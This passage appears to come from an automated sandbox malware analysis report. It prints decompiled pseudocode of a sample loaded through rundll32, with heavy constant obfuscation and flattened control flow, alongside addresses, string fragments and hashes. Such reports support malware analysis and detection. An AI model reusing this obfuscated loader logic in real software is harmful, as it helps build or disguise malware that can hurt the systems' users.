												_t173 = 0x17a504e8;
												while(1) {
													L1:
													_t191 = 0x5c;
													goto L2;
												}
											} else {
												if(_t173 == 0x17a504e8) {
													E00245FB2(_v32, _v60, _t204);
													_t173 = 0x3fc1d7;
													while(1) {
														L1:
														_t191 = 0x5c;
														L2:
														goto L3;
													}
												} else {
													if(_t173 != 0x1e312b00) {
														goto L21;
													} else {
														_t173 = 0x353ab5a;
														continue;
													}
												}
											}
										}
									}
								}
								goto L22;
							}
							E00245FB2(_v36, _v12, _t172);
							_t173 = 0x26181ebc;
							_t166 = 0xd265085;
							_t191 = 0x5c;
							L21:
						} while (_t173 != 0x26181ebc);
						L22:
						return _t196;
					}
				}
			}

0x002563c1
0x002563c4
0x002563d2
0x002563d4
0x002563d9
0x002563dd
0x002563e5
0x002563ed
0x002563f5
0x002563fd
0x00256405
0x0025640d
0x00256412
0x0025641a
0x00256422
0x0025642a
0x00256432
0x0025643a
0x00256442
0x0025644a
0x00256450
0x00256455
0x0025645b
0x00256463
0x0025646b
0x00256473
0x0025647b
0x00256483
0x0025648f
0x00256494
0x0025649a
0x0025649f
0x002564a7
0x002564b4
0x002564b7
0x002564bb
0x002564c3
0x002564cb
0x002564d3
0x002564d8
0x002564dd
0x002564e5
0x002564f5
0x002564f9
0x00256501
0x00256509
0x00256511
0x0025651d
0x00256520
0x00256524
0x0025652c
0x00256534
0x0025653c
0x00256544
0x0025654c
0x00256554
0x0025655c
0x00256564
0x0025656c
0x00256574
0x00256578
0x00256580
0x0025658d
0x00256591
0x00256599
0x002565a1
0x002565a9
0x002565ae
0x002565b6
0x002565be
0x002565c6
0x002565cb
0x002565d3
0x002565d7
0x002565db
0x002565df
0x002565e7
0x002565ef
0x002565f7
0x002565ff
0x002565ff
0x00256601
0x00256602
0x00256602
0x00256607
0x00000000
0x00256607
0x00256619
0x002566f6
0x002566fc
0x00256707
0x00256704
0x00256704
0x0025670c
0x0025670f
0x00000000
0x0025661f
0x00256625
0x002566d5
0x002566da
0x002566dd
0x002566e6
0x002566eb
0x002566f0
0x00000000
0x0025662b
0x00256631
0x002566a3
0x002566a8
0x002566aa
0x002566af
0x002566b5
0x00000000
0x002566b5
0x00256633
0x00256635
0x00256679
0x00256680
0x00256686
0x00256689
0x002565ff
0x002565ff
0x00256601
0x00000000
0x00256601
0x00256637
0x0025663d
0x0025665b
0x00256661
0x002565ff
0x002565ff
0x00256601
0x00256602
0x00000000
0x00256602
0x0025663f
0x00256645
0x00000000
0x0025664b
0x0025664b
0x00000000
0x0025664b
0x00256645
0x0025663d
0x00256635
0x00256631
0x00256625
0x00000000
0x00256619
0x00256722
0x0025672a
0x0025672f
0x00256734
0x00256735
0x00256735
0x00256741
0x0025674a
0x0025674a
0x00256602

Strings

*F, xrefs: 002564C3
R|, xrefs: 002564A7
2!, xrefs: 00256578
@', xrefs: 002565DF
ON, xrefs: 00256463
VLA_k, xrefs: 0025644A
};, xrefs: 00256432
A_k, xrefs: 002563C4
$/, xrefs: 002564F9

Memory Dump Source

Source File: 00000007.00000002.2104303323.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2104292967.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2104345430.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: $/$*F$2!$@'$A_k$ON$R|$VLA_k$};
API String ID: 0-175875280
Opcode ID: 4f652834dc948b86667515cae842944bfd3bfbca091d9f14d8239279e92a6f58
Instruction ID: d7e2a1eafe37eea982da661c1e5fb9b0c94090e1f39d8e8a47c17808e85f3aa2
Opcode Fuzzy Hash: 4f652834dc948b86667515cae842944bfd3bfbca091d9f14d8239279e92a6f58
Instruction Fuzzy Hash: FB8156711183819BD758CF24C49981BFBF1FBC4358F904A1CFA86466A0C7B58958CB87

Uniqueness

Uniqueness Score: -1.00%

Function 00252349, Relevance: 11.4, Strings: 9, Instructions: 190
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00252349(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16) {
				char _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				void* _t153;
				void* _t168;
				signed int _t172;
				char _t177;
				signed int _t178;
				void* _t181;
				char* _t186;
				signed int _t206;
				signed int _t207;
				signed int _t208;
				signed int _t209;
				signed int _t210;
				signed int* _t214;

				_push(_a16);
				_push(0x40);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0024602B(_t153);
				_v20 = 0x10;
				_t214 =  &(( &_v80)[6]);
				_v60 = 0xafa2;
				_v60 = _v60 ^ 0xad7cd4b0;
				_t178 = 0;
				_v60 = _v60 | 0x7a339cd1;
				_t181 = 0x15b39dc0;
				_v60 = _v60 ^ 0xff7ff485;
				_v64 = 0xe220;
				_v64 = _v64 >> 2;
				_v64 = _v64 | 0x618d1066;
				_v64 = _v64 ^ 0x618d4123;
				_v28 = 0xfe94;
				_t206 = 0x17;
				_v28 = _v28 / _t206;
				_v28 = _v28 ^ 0x000043c3;
				_v32 = 0x6fe3;
				_v32 = _v32 >> 1;
				_v32 = _v32 ^ 0x000078b7;
				_v36 = 0x3688;
				_t207 = 0x69;
				_v36 = _v36 * 0x5a;
				_v36 = _v36 ^ 0x00137d17;
				_v24 = 0x8157;
				_v24 = _v24 | 0x6dbfc3a0;
				_v24 = _v24 ^ 0x6dbfb45a;
				_v80 = 0xe945;
				_v80 = _v80 / _t207;
				_v80 = _v80 ^ 0xcc46d226;
				_t208 = 0x62;
				_v80 = _v80 / _t208;
				_v80 = _v80 ^ 0x0215c355;
				_v48 = 0x42ef;
				_v48 = _v48 + 0xffff3840;
				_v48 = _v48 << 4;
				_v48 = _v48 ^ 0xfff789fd;
				_v72 = 0xbf2b;
				_v72 = _v72 | 0xc326a1c7;
				_t209 = 0x4b;
				_v72 = _v72 / _t209;
				_v72 = _v72 | 0xd12f9700;
				_v72 = _v72 ^ 0xd3bfbe8a;
				_v52 = 0xfa61;
				_v52 = _v52 << 3;
				_v52 = _v52 + 0x5488;
				_v52 = _v52 ^ 0x00084626;
				_v56 = 0xb5dc;
				_v56 = _v56 | 0x6ca6e5ac;
				_v56 = _v56 * 0x5e;
				_v56 = _v56 ^ 0xe54e28a7;
				_v76 = 0xbf9d;
				_v76 = _v76 + 0xdb7b;
				_v76 = _v76 + 0xffff5618;
				_v76 = _v76 | 0xc179f847;
				_v76 = _v76 ^ 0xc1798349;
				_v40 = 0xd8e6;
				_v40 = _v40 + 0x2ceb;
				_v40 = _v40 + 0x406a;
				_v40 = _v40 ^ 0x0001168e;
				_v68 = 0x1b9c;
				_t210 = 0x7a;
				_v68 = _v68 * 0x38;
				_v68 = _v68 + 0xa456;
				_v68 = _v68 >> 0xe;
				_v68 = _v68 ^ 0x00002836;
				_v44 = 0x7a08;
				_v44 = _v44 << 0xd;
				_v44 = _v44 / _t210;
				_v44 = _v44 ^ 0x00205e6a;
				while(_t181 != 0x12ef740) {
					if(_t181 == 0x13e246ff) {
						__eflags = _v16;
						_t186 =  &_v16;
						while(__eflags != 0) {
							_t177 =  *_t186;
							__eflags = _t177 - 0x30;
							if(_t177 < 0x30) {
								L11:
								__eflags = _t177 - 0x61;
								if(_t177 < 0x61) {
									L13:
									__eflags = _t177 - 0x41;
									if(_t177 < 0x41) {
										L15:
										 *_t186 = 0x58;
									} else {
										__eflags = _t177 - 0x5a;
										if(_t177 > 0x5a) {
											goto L15;
										}
									}
								} else {
									__eflags = _t177 - 0x7a;
									if(_t177 > 0x7a) {
										goto L13;
									}
								}
							} else {
								__eflags = _t177 - 0x39;
								if(_t177 > 0x39) {
									goto L11;
								}
							}
							_t186 = _t186 + 1;
							__eflags =  *_t186;
						}
						_t181 = 0x12ef740;
						continue;
					} else {
						if(_t181 == 0x15b39dc0) {
							_t181 = 0x3a71512f;
							continue;
						} else {
							if(_t181 != 0x3a71512f) {
								L19:
								__eflags = _t181 - 0x2b24b5a2;
								if(__eflags != 0) {
									continue;
								}
							} else {
								if(E0024602C(_v60,  &_v16,  &_v20, _v64) != 0) {
									_t181 = 0x13e246ff;
									continue;
								}
							}
						}
					}
					return _t178;
				}
				_push(0x25c030);
				_push(_v36);
				_t168 = E0025878F(_v28, _v32, __eflags);
				E002531E2(__eflags);
				_t143 =  &_v56; // 0x205e6a
				_t172 = E00256A65(_v48, __eflags,  &_v16, _v72, _a16, 0x40, _t168, _v52,  *_t143, _v76);
				__eflags = _t172;
				_t152 = _t172 > 0;
				__eflags = _t152;
				_t178 = 0 | _t152;
				E00252025(_v40, _t168, _v68, _v44);
				_t214 =  &(_t214[0xc]);
				_t181 = 0x2b24b5a2;
				goto L19;
			}

0x00252350
0x00252354
0x00252356
0x0025235a
0x0025235e
0x0025235f
0x00252360
0x00252365
0x0025236d
0x00252370
0x0025237a
0x00252382
0x00252384
0x0025238c
0x00252391
0x00252399
0x002523a1
0x002523a6
0x002523ae
0x002523b6
0x002523c4
0x002523c9
0x002523cf
0x002523d7
0x002523df
0x002523e3
0x002523eb
0x002523f8
0x002523fb
0x002523ff
0x00252407
0x0025240f
0x00252417
0x0025241f
0x0025242f
0x00252433
0x0025243f
0x00252444
0x0025244a
0x00252452
0x0025245a
0x00252462
0x00252467
0x0025246f
0x00252477
0x00252483
0x00252486
0x0025248a
0x00252492
0x0025249a
0x002524a2
0x002524a7
0x002524af
0x002524b7
0x002524bf
0x002524cc
0x002524d0
0x002524d8
0x002524e0
0x002524e8
0x002524f2
0x002524ff
0x0025250c
0x00252514
0x0025251c
0x00252524
0x0025252c
0x0025253b
0x0025253c
0x00252540
0x00252548
0x0025254d
0x00252555
0x0025255d
0x00252568
0x0025256c
0x00252574
0x0025257a
0x002525bb
0x002525c0
0x002525c4
0x002525c6
0x002525c8
0x002525ca
0x002525d0
0x002525d0
0x002525d2
0x002525d8
0x002525d8
0x002525da
0x002525e0
0x002525e0
0x002525dc
0x002525dc
0x002525de
0x00000000
0x00000000
0x002525de
0x002525d4
0x002525d4
0x002525d6
0x00000000
0x00000000
0x002525d6
0x002525cc
0x002525cc
0x002525ce
0x00000000
0x00000000
0x002525ce
0x002525e3
0x002525e4
0x002525e4
0x002525e9
0x00000000
0x0025257c
0x00252582
0x002525b4
0x00000000
0x00252584
0x0025258a
0x0025265e
0x0025265e
0x00252664
0x00000000
0x00000000
0x00252590
0x002525aa
0x002525b0
0x00000000
0x002525b0
0x002525aa
0x0025258a
0x00252582
0x00252673
0x00252673
0x002525ed
0x002525f2
0x002525fe
0x0025260d
0x0025261a
0x00252637
0x0025264c
0x0025264e
0x0025264e
0x0025264e
0x00252651
0x00252656
0x00252659
0x00000000

Strings

6(, xrefs: 0025254D
, xrefs: 00252399
/Qq:, xrefs: 00252584
j^ , xrefs: 00252562
j^ , xrefs: 0025261A
j@, xrefs: 0025251C
o, xrefs: 002523D7
/Qq:, xrefs: 002525B4
E, xrefs: 0025241F

Memory Dump Source

Source File: 00000007.00000002.2104303323.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2104292967.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2104345430.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: $/Qq:$/Qq:$6($E$j@$j^ $j^ $o
API String ID: 0-892457230
Opcode ID: 1f9e741cfa107f421632e443d30f0f84888e96591f8997509bec4f1633212b5f
Instruction ID: 5975a23788f36fa8bca7a602fdacb375b6d185c091fa7317bfb9e766790e5403
Opcode Fuzzy Hash: 1f9e741cfa107f421632e443d30f0f84888e96591f8997509bec4f1633212b5f
Instruction Fuzzy Hash: 0181A771519341DFD768CF25C98A51BBBE1BBC1B18F80480DF5819A2A0D7B5CA1ACF4B

Uniqueness

Uniqueness Score: -1.00%

Function 10002D70, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108commemoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"><xsl:output method="text" version="1.0" encoding="), ref: 10002D7F
CoCreateInstance.OLE32(1000D4B0,00000000,00000001,1000D4C0,?), ref: 10002DB0
PropVariantClear.OLE32(?), ref: 10002E75
SysFreeString.OLEAUT32(00000000), ref: 10002E7E
SysFreeString.OLEAUT32(00000000), ref: 10002E97

Strings

<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"><xsl:output method="text" version="1.0" encoding=", xrefs: 10002D77

Memory Dump Source

Source File: 00000007.00000002.2109745259.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2109727549.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2109828341.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2109839027.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2109852772.0000000010015000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: String$Free$AllocClearCreateInstancePropVariant
String ID: <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"><xsl:output method="text" version="1.0" encoding="
API String ID: 2501108336-1018649646
Opcode ID: 96621fcdecdd77bcd87e053180f01b167328e1e2a90fb6c4d0d6cfded311a5a7
Instruction ID: 0b0c17a62beb8f9cda8331f18031103c31f3880d59fc8f905040adcea8ba8702
Opcode Fuzzy Hash: 96621fcdecdd77bcd87e053180f01b167328e1e2a90fb6c4d0d6cfded311a5a7
Instruction Fuzzy Hash: D5417071D0022AAFDB00DBA4CC48ADEB7B8EF48754F114199F905EB254DB71DE01CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00259B45, Relevance: 10.3, Strings: 8, Instructions: 294
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E00259B45(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				signed int* _v4;
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				unsigned int _v112;
				signed int _v116;
				void* _t241;
				intOrPtr _t259;
				void* _t260;
				intOrPtr _t268;
				intOrPtr _t269;
				intOrPtr _t270;
				intOrPtr _t274;
				intOrPtr* _t281;
				signed int _t283;
				void* _t315;
				intOrPtr* _t316;
				signed int _t317;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				signed int* _t322;
				signed int* _t325;
				void* _t327;

				_t281 = _a8;
				_push(_t281);
				_push(_a4);
				_t316 = __ecx;
				_push(__edx);
				_push(__ecx);
				E0024602B(_t241);
				_v76 = 0xd801;
				_t325 =  &(( &_v116)[4]);
				_v76 = _v76 >> 6;
				_t315 = 0;
				_t283 = 0xafaf7d2;
				_t317 = 6;
				_v76 = _v76 * 0x2a;
				_v76 = _v76 ^ 0x0000b202;
				_v80 = 0xa1a8;
				_v80 = _v80 | 0xe917477a;
				_v80 = _v80 << 2;
				_v80 = _v80 ^ 0xa45f8c0e;
				_v84 = 0x144b;
				_v84 = _v84 + 0xffffbc75;
				_v84 = _v84 * 0x6d;
				_v84 = _v84 ^ 0xffeb93ca;
				_v52 = 0x2e4b;
				_v52 = _v52 | 0x557249c0;
				_v52 = _v52 ^ 0x346b51fe;
				_v52 = _v52 ^ 0x611902e1;
				_v56 = 0xfad0;
				_v56 = _v56 + 0xffff1342;
				_v56 = _v56 ^ 0x8fd20197;
				_v56 = _v56 ^ 0x8fd21d65;
				_v96 = 0x8e39;
				_v96 = _v96 + 0xd833;
				_v96 = _v96 + 0xffffc0bd;
				_v96 = _v96 >> 0xa;
				_v96 = _v96 ^ 0x000036ba;
				_v12 = 0xb209;
				_v12 = _v12 ^ 0xf6f529e5;
				_v12 = _v12 ^ 0xf6f5ec43;
				_v64 = 0xc247;
				_v64 = _v64 + 0xffff53d4;
				_v64 = _v64 << 9;
				_v64 = _v64 ^ 0x002c2f20;
				_v100 = 0x41c0;
				_v100 = _v100 | 0x528356d8;
				_v100 = _v100 ^ 0x6d95e5a5;
				_v100 = _v100 >> 1;
				_v100 = _v100 ^ 0x1f8b2fe0;
				_v16 = 0x904b;
				_v16 = _v16 + 0x3d62;
				_v16 = _v16 ^ 0x0000a85c;
				_v68 = 0xf7e0;
				_v68 = _v68 | 0xcc3d0ce1;
				_v68 = _v68 >> 7;
				_v68 = _v68 ^ 0x01982b66;
				_v72 = 0x69a0;
				_v72 = _v72 / _t317;
				_v72 = _v72 ^ 0xd5ac5c66;
				_v72 = _v72 ^ 0xd5ac219b;
				_v20 = 0x9739;
				_v20 = _v20 << 2;
				_v20 = _v20 ^ 0x000260e8;
				_v24 = 0xc564;
				_t318 = 0x2c;
				_v24 = _v24 / _t318;
				_v24 = _v24 ^ 0x00005d30;
				_v88 = 0xe78a;
				_v88 = _v88 >> 1;
				_v88 = _v88 << 4;
				_v88 = _v88 ^ 0x00070feb;
				_v28 = 0x7421;
				_v28 = _v28 + 0xffff545c;
				_v28 = _v28 ^ 0xfffff127;
				_v32 = 0x3ef3;
				_t319 = 0x23;
				_v32 = _v32 * 0x1e;
				_v32 = _v32 ^ 0x00070388;
				_v36 = 0x1f6a;
				_v36 = _v36 << 0xa;
				_v36 = _v36 ^ 0x007d8833;
				_v104 = 0xc791;
				_v104 = _v104 + 0xffffa2ac;
				_v104 = _v104 * 0x2b;
				_v104 = _v104 + 0x587f;
				_v104 = _v104 ^ 0x00127594;
				_v40 = 0xa663;
				_v40 = _v40 + 0xffffc5d4;
				_v40 = _v40 ^ 0x00001ad7;
				_v44 = 0x2b76;
				_v44 = _v44 << 0xc;
				_v44 = _v44 ^ 0x02b774b0;
				_v92 = 0xa27;
				_v92 = _v92 / _t319;
				_v92 = _v92 + 0xffff3569;
				_v92 = _v92 ^ 0xffff2eae;
				_v108 = 0xf211;
				_t320 = 0x54;
				_v108 = _v108 / _t320;
				_v108 = _v108 >> 0xb;
				_v108 = _v108 | 0x89ac3126;
				_v108 = _v108 ^ 0x89ac4c52;
				_v112 = 0x8d71;
				_v112 = _v112 >> 0xa;
				_v112 = _v112 | 0xeb52e524;
				_v112 = _v112 >> 4;
				_v112 = _v112 ^ 0x0eb57242;
				_v48 = 0x270e;
				_v48 = _v48 | 0xda2d7f86;
				_v48 = _v48 ^ 0xda2d74b2;
				_v116 = 0xd303;
				_v116 = _v116 ^ 0x52d81e99;
				_t321 = 0x2e;
				_t322 = _v4;
				_v116 = _v116 / _t321;
				_v116 = _v116 * 0x47;
				_v116 = _v116 ^ 0x7fdf43a3;
				while(1) {
					_t258 = _v60;
					while(1) {
						L2:
						_t327 = _t283 - 0x1af8f879;
						if(_t327 <= 0) {
							break;
						}
						if(_t283 == 0x20f5637b) {
							_t259 =  *0x25ca20; // 0x0
							_t260 = E00251B49( &_v8, _v12, _t283,  *((intOrPtr*)(_t259 + 0x2c)), _t283, _v64, _v100);
							_t325 =  &(_t325[5]);
							if(_t260 == 0) {
								_t283 = 0x33905d8a;
								L26:
								if(_t283 == 0xc271ab7) {
									L30:
									return _t315;
								}
								while(1) {
									_t258 = _v60;
									goto L2;
								}
							}
							_t283 = 0x1af8f879;
							while(1) {
								_t258 = _v60;
								goto L2;
							}
						}
						if(_t283 == 0x28aacb6e) {
							if( *((intOrPtr*)(_t281 + 4)) < 0x74) {
								goto L30;
							}
							_t283 = 0x351bb9b3;
							continue;
						}
						if(_t283 == 0x33905d8a) {
							if(_t315 == 0) {
								E0024F536(_v52, _v56, _v96,  *_t316);
							}
							goto L30;
						}
						if(_t283 != 0x351bb9b3) {
							goto L26;
						}
						_t283 = 0xa3bf63c;
					}
					if(_t327 == 0) {
						E00252674(_v16, _v68, _t322,  *_t316, _v72, _v20, _t258);
						_t325 =  &(_t325[5]);
						_t283 = 0xc483d1b;
						while(1) {
							_t258 = _v60;
							goto L2;
						}
					}
					if(_t283 == 0xa3bf63c) {
						 *((intOrPtr*)(_t316 + 4)) =  *((intOrPtr*)(_t281 + 4)) - 0x74;
						_push(_t283);
						_push(_t283);
						_t268 = E00248736( *((intOrPtr*)(_t316 + 4)));
						 *_t316 = _t268;
						if(_t268 == 0) {
							goto L30;
						}
						_t269 =  *_t281;
						_t283 = 0x20f5637b;
						_v4 = _t269;
						_t258 = _t269 + 0x74;
						_v60 = _t269 + 0x74;
						_t322 =  &_v116;
						goto L2;
					}
					if(_t283 == 0xafaf7d2) {
						_t283 = 0x28aacb6e;
						goto L2;
					}
					if(_t283 == 0xc483d1b) {
						_t270 =  *0x25ca20; // 0x0
						E002455D8(_v24, _v8, _t283, _t316 + 4, _v88,  *_t316, _v28, _v32, _v36,  *((intOrPtr*)(_t270 + 0x10)), _v104);
						_t325 =  &(_t325[0xa]);
						asm("sbb ecx, ecx");
						_t283 = (_t283 & 0xfff990e9) + 0x199ab82a;
						while(1) {
							_t258 = _v60;
							goto L2;
						}
					}
					if(_t283 == 0x19944913) {
						_t274 =  *0x25ca20; // 0x0
						_push(_t283);
						_push(_t283);
						E0025838C(_v40, _v44, _v92, _v108, _t283, _v4, _v8,  *((intOrPtr*)(_t274 + 0x24)));
						_t325 =  &(_t325[8]);
						_t315 =  !=  ? 1 : _t315;
						_t283 = 0x199ab82a;
						while(1) {
							_t258 = _v60;
							goto L2;
						}
					}
					if(_t283 != 0x199ab82a) {
						goto L26;
					}
					_push(_t283);
					_push(_t283);
					E00245F43(_t283, _v8);
					_t283 = 0x33905d8a;
				}
			}

0x00259b49
0x00259b53
0x00259b54
0x00259b5b
0x00259b5d
0x00259b5e
0x00259b5f
0x00259b64
0x00259b6c
0x00259b6f
0x00259b7b
0x00259b7d
0x00259b84
0x00259b87
0x00259b8b
0x00259b93
0x00259b9b
0x00259ba3
0x00259ba8
0x00259bb0
0x00259bb8
0x00259bc5
0x00259bc9
0x00259bd1
0x00259bd9
0x00259be1
0x00259be9
0x00259bf1
0x00259bf9
0x00259c01
0x00259c09
0x00259c11
0x00259c19
0x00259c21
0x00259c29
0x00259c2e
0x00259c36
0x00259c3e
0x00259c46
0x00259c4e
0x00259c56
0x00259c5e
0x00259c63
0x00259c6b
0x00259c73
0x00259c7b
0x00259c83
0x00259c87
0x00259c8f
0x00259c97
0x00259c9f
0x00259ca7
0x00259caf
0x00259cb7
0x00259cbc
0x00259cc4
0x00259cd4
0x00259cd8
0x00259ce0
0x00259ce8
0x00259cf0
0x00259cf5
0x00259cfd
0x00259d09
0x00259d0c
0x00259d10
0x00259d18
0x00259d20
0x00259d26
0x00259d2b
0x00259d33
0x00259d3b
0x00259d43
0x00259d4b
0x00259d5a
0x00259d5d
0x00259d61
0x00259d69
0x00259d71
0x00259d76
0x00259d7e
0x00259d86
0x00259d93
0x00259d97
0x00259d9f
0x00259da7
0x00259daf
0x00259db7
0x00259dbf
0x00259dc7
0x00259dcc
0x00259dd4
0x00259de4
0x00259de8
0x00259df0
0x00259df8
0x00259e04
0x00259e09
0x00259e0f
0x00259e14
0x00259e1c
0x00259e24
0x00259e2c
0x00259e31
0x00259e39
0x00259e3e
0x00259e46
0x00259e4e
0x00259e56
0x00259e5e
0x00259e66
0x00259e72
0x00259e75
0x00259e7c
0x00259e85
0x00259e89
0x00259e91
0x00259e91
0x00259e95
0x00259e95
0x00259e95
0x00259e9b
0x00000000
0x00000000
0x0025a010
0x0025a04c
0x0025a064
0x0025a069
0x0025a06e
0x0025a07a
0x0025a07f
0x0025a085
0x0025a0a5
0x0025a0ae
0x0025a0ae
0x00259e91
0x00259e91
0x00000000
0x00259e91
0x00259e91
0x0025a070
0x00259e91
0x00259e91
0x00000000
0x00259e91
0x00259e91
0x0025a018
0x0025a038
0x00000000
0x00000000
0x0025a03a
0x00000000
0x0025a03a
0x0025a020
0x0025a08e
0x0025a09e
0x0025a0a4
0x00000000
0x0025a08e
0x0025a028
0x00000000
0x00000000
0x0025a02a
0x0025a02a
0x00259ea1
0x00259ff8
0x00259ffd
0x0025a000
0x00259e91
0x00259e91
0x00000000
0x00259e91
0x00259e91
0x00259ead
0x00259f9c
0x00259fab
0x00259fac
0x00259fb0
0x00259fb5
0x00259fbb
0x00000000
0x00000000
0x00259fc1
0x00259fc3
0x00259fcb
0x00259fd2
0x00259fd5
0x00259fd9
0x00000000
0x00259fd9
0x00259eb9
0x00259f8c
0x00000000
0x00259f8c
0x00259ec5
0x00259f42
0x00259f6f
0x00259f74
0x00259f79
0x00259f81
0x00259e91
0x00259e91
0x00000000
0x00259e91
0x00259e91
0x00259ecd
0x00259efb
0x00259f00
0x00259f01
0x00259f24
0x00259f2b
0x00259f31
0x00259f34
0x00259e91
0x00259e91
0x00000000
0x00259e91
0x00259e91
0x00259ed5
0x00000000
0x00000000
0x00259eeb
0x00259eec
0x00259eed
0x00259ef4
0x00259ef4

Strings

b=, xrefs: 00259C97
0], xrefs: 00259D10
!t, xrefs: 00259D33
K., xrefs: 00259BD1
', xrefs: 00259DD4
v+, xrefs: 00259DBF
$R, xrefs: 00259E31
/,, xrefs: 00259C63

Memory Dump Source

Source File: 00000007.00000002.2104303323.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2104292967.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2104345430.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: /,$!t$$R$'$0]$K.$b=$v+
API String ID: 0-2997250437
Opcode ID: 3f996a01f93c1ba523a572f275d4763f150af37b35edb0159e1b98bcdac621cf
Instruction ID: 85488962f915a21240ddf186161d8b3a058a1fa43cc578057993a9d7507cbac3
Opcode Fuzzy Hash: 3f996a01f93c1ba523a572f275d4763f150af37b35edb0159e1b98bcdac621cf
Instruction Fuzzy Hash: ECD14371018341CFD768CF24C98A91BBBE1FB84708F208A1DF596862A0D7B9C959CF47

Uniqueness

Uniqueness Score: -1.00%

Function 002512E2, Relevance: 10.2, Strings: 8, Instructions: 239
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E002512E2() {
				char _v520;
				char _v1040;
				signed int _v1044;
				signed int _v1048;
				intOrPtr _v1052;
				intOrPtr _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				unsigned int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				short* _t246;
				intOrPtr _t256;
				void* _t257;
				void* _t261;
				void* _t271;
				intOrPtr _t293;
				signed int _t297;
				signed int _t298;
				signed int _t299;
				signed int _t300;
				signed int _t301;
				signed int _t302;
				signed int _t303;
				signed int* _t306;

				_t306 =  &_v1148;
				_v1048 = _v1048 & 0x00000000;
				_v1044 = _v1044 & 0x00000000;
				_t261 = 0x1f2b77a6;
				_v1056 = 0x1c0398;
				_v1052 = 0x1a4c8e;
				_v1080 = 0xed6b;
				_v1080 = _v1080 + 0xffffb43c;
				_v1080 = _v1080 ^ 0x000092bf;
				_v1104 = 0xc4aa;
				_v1104 = _v1104 * 0x6d;
				_t297 = 0x23;
				_v1104 = _v1104 / _t297;
				_v1104 = _v1104 ^ 0x00022488;
				_v1112 = 0xb9;
				_v1112 = _v1112 + 0xffff6145;
				_v1112 = _v1112 + 0xc51a;
				_v1112 = _v1112 ^ 0x0000206d;
				_v1132 = 0x8b7;
				_v1132 = _v1132 + 0xffff38b6;
				_v1132 = _v1132 ^ 0xb2a0a749;
				_t298 = 0x57;
				_v1132 = _v1132 / _t298;
				_v1132 = _v1132 ^ 0x00e3f1cf;
				_v1084 = 0x5f6a;
				_v1084 = _v1084 << 0xa;
				_v1084 = _v1084 ^ 0x017dcd17;
				_v1108 = 0xc835;
				_v1108 = _v1108 >> 0xd;
				_t51 =  &_v1108; // 0xd
				_t299 = 3;
				_v1108 =  *_t51 * 7;
				_v1108 = _v1108 ^ 0x00005049;
				_v1100 = 0x845e;
				_v1100 = _v1100 + 0x74c1;
				_v1100 = _v1100 << 3;
				_v1100 = _v1100 ^ 0x0007b300;
				_v1116 = 0xc35d;
				_v1116 = _v1116 * 0x33;
				_v1116 = _v1116 >> 9;
				_v1116 = _v1116 ^ 0x000042ed;
				_v1120 = 0x8ea6;
				_v1120 = _v1120 >> 2;
				_v1120 = _v1120 | 0xab635639;
				_v1120 = _v1120 ^ 0xab63670d;
				_v1092 = 0x4c03;
				_v1092 = _v1092 | 0x601fb915;
				_v1092 = _v1092 ^ 0x04845a80;
				_v1092 = _v1092 ^ 0x649be272;
				_v1076 = 0x4c13;
